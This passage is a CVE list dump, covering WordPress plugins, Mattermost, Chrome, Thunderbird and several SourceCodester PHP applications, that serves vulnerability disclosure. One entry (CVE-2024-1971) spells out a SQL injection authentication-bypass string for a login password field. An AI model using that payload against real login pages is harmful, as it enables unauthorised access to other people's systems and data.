URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L333   |   MISC:https://wordpress.org/plugins/woocommerce-jetpack/   |   URL:https://wordpress.org/plugins/woocommerce-jetpack/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve    Assigned (20240228)
CVE    2024    1985    Candidate    The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.    MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L103   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L103   |   MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L112   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L112   |   MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L121   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L121   |   MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L130   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L130   |   MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L139   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L139   |   MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L157   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L157   |   MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L85   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L85   |   MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L95   |   URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L95   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve    Assigned (20240228)
CVE    2024    1983    Candidate    The Simple Ajax Chat WordPress plugin before 20240223 does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users.    MISC:https://wpscan.com/vulnerability/bf3a31de-a227-4db1-bd18-ce6a78dc96fb/   |   URL:https://wpscan.com/vulnerability/bf3a31de-a227-4db1-bd18-ce6a78dc96fb/    Assigned (20240228)
CVE    2024    1982    Candidate    The Migration, Backup, Staging – WPvivid plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the get_restore_progress() and restore() functions in all versions up to, and including, 0.9.68. This makes it possible for unauthenticated attackers to exploit a SQL injection vulnerability or trigger a DoS.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839   |   MISC:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/   |   URL:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve    Assigned (20240228)
CVE    2024    1981    Candidate    The Migration, Backup, Staging – WPvivid plugin for WordPress is vulnerable to SQL Injection via the 'table_prefix' parameter in version 0.9.68 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839   |   MISC:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/   |   URL:https://research.hisolutions.com/2024/01/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve    Assigned (20240228)
CVE    2024    1979    Candidate    A vulnerability was found in Quarkus. In certain conditions related to the CI process, git credentials could be inadvertently published, which could put the git repository at risk.    MISC:RHBZ#2266690   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2266690   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1979   |   URL:https://access.redhat.com/security/cve/CVE-2024-1979   |   MISC:https://github.com/quarkusio/quarkus/issues/38055   |   URL:https://github.com/quarkusio/quarkus/issues/38055    Assigned (20240228)
CVE    2024    1978    Candidate    The Friends plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.8.5 via the discover_available_feeds function. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.    MISC:https://github.com/akirk/friends/pull/290   |   URL:https://github.com/akirk/friends/pull/290   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve    Assigned (20240228)
CVE    2024    1977    Candidate    The Restaurant Solutions – Checklist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Checklist points in version 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2022-004   |   URL:https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2022-004   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8dca7f2e-f572-468a-8342-a6e096441561?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8dca7f2e-f572-468a-8342-a6e096441561?source=cve    Assigned (20240228)
CVE    2024    1976    Candidate    The Marketing Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20200925. This is due to missing or incorrect nonce validation via the admin/main-settings-page.php file. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/marketing-optimizer/trunk/admin/main-settings-page.php   |   URL:https://plugins.trac.wordpress.org/browser/marketing-optimizer/trunk/admin/main-settings-page.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve    Assigned (20240228)
CVE    2024    1973    Candidate    By leveraging the vulnerability, lower-privileged users of Content Manager can manipulate Content Manager clients to elevate privileges and perform unauthorized operations.    MISC:https://portal.microfocus.com/s/article/KM000027861   |   URL:https://portal.microfocus.com/s/article/KM000027861    Assigned (20240228)
CVE    2024    1972    Candidate    A vulnerability was found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Employer/EditProfile.php. The manipulation of the argument Address leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255128.    MISC:VDB-255128 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255128   |   MISC:VDB-255128 | SourceCodester Online Job Portal EditProfile.php cross site scripting   |   URL:https://vuldb.com/?id.255128   |   MISC:https://prnt.sc/gtk7Fj43Qwy9   |   URL:https://prnt.sc/gtk7Fj43Qwy9    Assigned (20240228)
CVE    2024    1971    Candidate    A vulnerability has been found in Surya2Developer Online Shopping System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php of the component POST Parameter Handler. The manipulation of the argument password with the input nochizplz'+or+1%3d1+limit+1%23 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255127.    MISC:VDB-255127 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255127   |   MISC:VDB-255127 | Surya2Developer Online Shopping System POST Parameter login.php sql injection   |   URL:https://vuldb.com/?id.255127   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SQL%20Injection%20Auth.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SQL%20Injection%20Auth.md    Assigned (20240228)
CVE    2024    1970    Candidate    A vulnerability, which was classified as problematic, was found in SourceCodester Online Learning System V2 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255126 is the identifier assigned to this vulnerability.    MISC:VDB-255126 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255126   |   MISC:VDB-255126 | SourceCodester Online Learning System V2 index.php cross site scripting   |   URL:https://vuldb.com/?id.255126   |   MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/OnlineLearningSystemV2-XSS.md   |   URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/OnlineLearningSystemV2-XSS.md    Assigned (20240228)
CVE    2024    1965    Candidate    Server-Side Request Forgery vulnerability in Haivision's Aviwest Manager and Aviwest Steamhub. This vulnerability could allow an attacker to enumerate internal network configuration without the need for credentials. An attacker could compromise an internal server and retrieve requests sent by other users.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/server-side-request-forgery-vulnerability-haivision-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/server-side-request-forgery-vulnerability-haivision-products    Assigned (20240228)
CVE    2024    1962    Candidate    The CM Download Manager WordPress plugin before 2.9.1 does not have CSRF checks in some places, which could allow attackers to make logged in admins edit downloads via a CSRF attack.    MISC:https://wpscan.com/vulnerability/469486d4-7677-4d66-83c0-a6b9ac7c503b/   |   URL:https://wpscan.com/vulnerability/469486d4-7677-4d66-83c0-a6b9ac7c503b/    Assigned (20240227)
CVE    2024    1954    Candidate    The Oliver POS – A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1.8. This is due to missing or incorrect nonce validation in the includes/class-pos-bridge-install.php file. This makes it possible for unauthenticated attackers to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve    Assigned (20240227)
CVE    2024    1953    Candidate    Mattermost versions 8.1.x before 8.1.9, 9.2.x before 9.2.5, 9.3.0, and 9.4.x before 9.4.2 fail to limit the number of role names requested from the API, allowing an authenticated attacker to cause the server to run out of memory and crash by issuing an unusually large HTTP request.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240227)
CVE    2024    1952    Candidate    Mattermost version 8.1.x before 8.1.9 fails to sanitize data associated with permalinks when a plugin updates an ephemeral post, allowing an authenticated attacker who can control the ephemeral post update to access individual posts' contents in channels they are not a member of.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240227)
CVE    2024    1951    Candidate    The Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization via shortcode of untrusted input. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-adl-metabox.php   |   URL:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-adl-metabox.php   |   MISC:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-shortcode.php   |   URL:https://plugins.trac.wordpress.org/browser/logo-showcase-ultimate/tags/1.3.8/classes/lcg-shortcode.php   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/logo-showcase-ultimate/tags/1.3.8&old=3045923&new_path=/logo-showcase-ultimate/tags/1.3.9&new=3045923&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/logo-showcase-ultimate/tags/1.3.8&old=3045923&new_path=/logo-showcase-ultimate/tags/1.3.9&new=3045923&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve    Assigned (20240227)
CVE    2024    1950    Candidate    The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.7 via deserialization of untrusted input via shortcode. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-meta-box.php   |   URL:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-meta-box.php   |   MISC:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-shortcode.php   |   URL:https://plugins.trac.wordpress.org/browser/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7/includes/classes/class-shortcode.php   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7&old=3045923&new_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.8&new=3045923&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.7&old=3045923&new_path=/woo-product-carousel-slider-and-grid-ultimate/tags/1.9.8&new=3045923&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve    Assigned (20240227)
CVE    2024    1949    Candidate    A race condition in Mattermost versions 8.1.x before 8.1.9, and 9.4.x before 9.4.2 allows an authenticated attacker to gain unauthorized access to individual posts' contents via carefully timed post creation while another user deletes posts.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240227)
CVE    2024    1943    Candidate    The Yuki theme for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.14. This is due to missing or incorrect nonce validation on the reset_customizer_options() function. This makes it possible for unauthenticated attackers to reset the theme's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://themes.trac.wordpress.org/changeset/218603/yuki/1.3.15/inc/extensions/class-reset-extension.php   |   URL:https://themes.trac.wordpress.org/changeset/218603/yuki/1.3.15/inc/extensions/class-reset-extension.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dfb760fb-f281-4649-9bd3-92f8e281f07e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dfb760fb-f281-4649-9bd3-92f8e281f07e?source=cve    Assigned (20240227)
CVE    2024    1942    Candidate    Mattermost versions 8.1.x before 8.1.9, 9.2.x before 9.2.5, and 9.3.0 fail to sanitize the metadata on posts containing permalinks under specific conditions, which allows an authenticated attacker to access the contents of individual posts in channels they are not a member of.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240227)
CVE    2024    1941    Candidate    Delta Electronics CNCSoft-B versions 1.0.0.4 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to execute arbitrary code.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-060-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-060-01    Assigned (20240227)
CVE    2024    1939    Candidate    Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-129d8ca6fc   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTGM2WHYSZAUUPENB7YO6E5ONAKE6AKJ/   |   FEDORA:FEDORA-2024-449696cdb8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6KJCEJWJR5Z54Z75LRJGELDNMFDKLZG/   |   FEDORA:FEDORA-2024-9ce64d8940   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGWSP5MIK7CDWJQHN2SJJX2YGSSS7E4O/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html   |   MISC:https://issues.chromium.org/issues/323694592   |   URL:https://issues.chromium.org/issues/323694592    Assigned (20240227)
CVE    2024    1938    Candidate    Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-129d8ca6fc   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTGM2WHYSZAUUPENB7YO6E5ONAKE6AKJ/   |   FEDORA:FEDORA-2024-449696cdb8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6KJCEJWJR5Z54Z75LRJGELDNMFDKLZG/   |   FEDORA:FEDORA-2024-9ce64d8940   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGWSP5MIK7CDWJQHN2SJJX2YGSSS7E4O/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_27.html   |   MISC:https://issues.chromium.org/issues/324596281   |   URL:https://issues.chromium.org/issues/324596281    Assigned (20240227)
CVE    2024    1936    Candidate    The encrypted subject of an email message could be incorrectly and permanently assigned to an arbitrary other email message in Thunderbird's local cache. Consequently, when replying to the contaminated email message, the user might accidentally leak the confidential subject to a third party. While this update fixes the bug and avoids future message contamination, it does not automatically repair existing contaminations. Users are advised to use the repair folder functionality, which is available from the context menu of email folders, which will erase incorrect subject assignments. This vulnerability affects Thunderbird < 115.8.1.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1860977   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1860977   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-11/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-11/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html    Assigned (20240227)
CVE    2024    1935    Candidate    The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘parent_url’ parameter in all versions up to, and including, 1.12.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.5/resources/views/rafflepress-giveaway.php   |   URL:https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.5/resources/views/rafflepress-giveaway.php   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/rafflepress/tags/1.12.5&old=3043286&new_path=/rafflepress/tags/1.12.7&new=3043286&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/rafflepress/tags/1.12.5&old=3043286&new_path=/rafflepress/tags/1.12.7&new=3043286&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve    Assigned (20240227)
CVE    2024    1933    Candidate    Insecure UNIX Symbolic Link (Symlink) Following in TeamViewer Remote Client prior to version 15.52 for macOS allows an attacker with unprivileged access to potentially elevate privileges or conduct a denial-of-service attack by overwriting the symlink.    MISC:https://www.teamviewer.com/de/resources/trust-center/security-bulletins/tv-2024-1002/   |   URL:https://www.teamviewer.com/de/resources/trust-center/security-bulletins/tv-2024-1002/    Assigned (20240227)
CVE    2024    1932    Candidate    Unrestricted Upload of File with Dangerous Type in freescout-helpdesk/freescout    MISC:https://huntr.com/bounties/fefd711e-3bf0-4884-9acc-167649c1f9a2   |   URL:https://huntr.com/bounties/fefd711e-3bf0-4884-9acc-167649c1f9a2    Assigned (20240227)
CVE    2024    1931    Candidate    NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contains a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records, however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used, which is a non-default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely.    MISC:https://www.nlnetlabs.nl/downloads/unbound/CVE-2024-1931.txt   |   URL:https://www.nlnetlabs.nl/downloads/unbound/CVE-2024-1931.txt    Assigned (20240227)
CVE    2024    1928    Candidate    A vulnerability, which was classified as critical, has been found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit-admin.php of the component Edit User Profile Page. The manipulation of the argument Fullname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254864.    MISC:VDB-254864 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254864   |   MISC:VDB-254864 | SourceCodester Web-Based Student Clearance System Edit User Profile Page edit-admin.php sql injection   |   URL:https://vuldb.com/?id.254864   |   MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20XSS.md   |   URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20XSS.md    Assigned (20240227)
CVE    2024    1927    Candidate    A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file /Admin/login.php. The manipulation of the argument txtpassword leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254863.    MISC:VDB-254863 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254863   |   MISC:VDB-254863 | SourceCodester Web-Based Student Clearance System login.php sql injection   |   URL:https://vuldb.com/?id.254863   |   MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20SQLi.md   |   URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Web-Based%20Student%20Clearance%20System%20-%20SQLi.md    Assigned (20240227)
CVE    2024    1926    Candidate    A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /app/ajax/search_sales_report.php. The manipulation of the argument customer leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254861 was assigned to this vulnerability.    MISC:VDB-254861 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254861   |   MISC:VDB-254861 | SourceCodester Free and Open Source Inventory Management System search_sales_report.php sql injection   |   URL:https://vuldb.com/?id.254861   |   MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Free%20and%20Open%20Source%20inventory%20management%20system-SQLi.md   |   URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Free%20and%20Open%20Source%20inventory%20management%20system-SQLi.md    Assigned (20240227)
CVE    2024    1925    Candidate    A vulnerability was found in Ctcms 2.1.2. It has been declared as critical. This vulnerability affects unknown code of the file ctcms/apps/controllers/admin/Upsys.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254860.    MISC:VDB-254860 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254860   |   MISC:VDB-254860 | Ctcms Upsys.php unrestricted upload   |   URL:https://vuldb.com/?id.254860   |   MISC:https://docs.qq.com/doc/DQkVmRXBlbGNPZmlL   |   URL:https://docs.qq.com/doc/DQkVmRXBlbGNPZmlL    Assigned (20240227)
CVE    2024    1924    Candidate    A vulnerability was found in CodeAstro Membership Management System 1.0. It has been classified as critical. This affects an unknown part of the file /get_membership_amount.php. The manipulation of the argument membershipTypeId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254859.    MISC:VDB-254859 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254859   |   MISC:VDB-254859 | CodeAstro Membership Management System get_membership_amount.php sql injection   |   URL:https://vuldb.com/?id.254859   |   MISC:https://github.com/1testnew/CVE_Hunter/blob/main/SQLi-1.md   |   URL:https://github.com/1testnew/CVE_Hunter/blob/main/SQLi-1.md    Assigned (20240227)
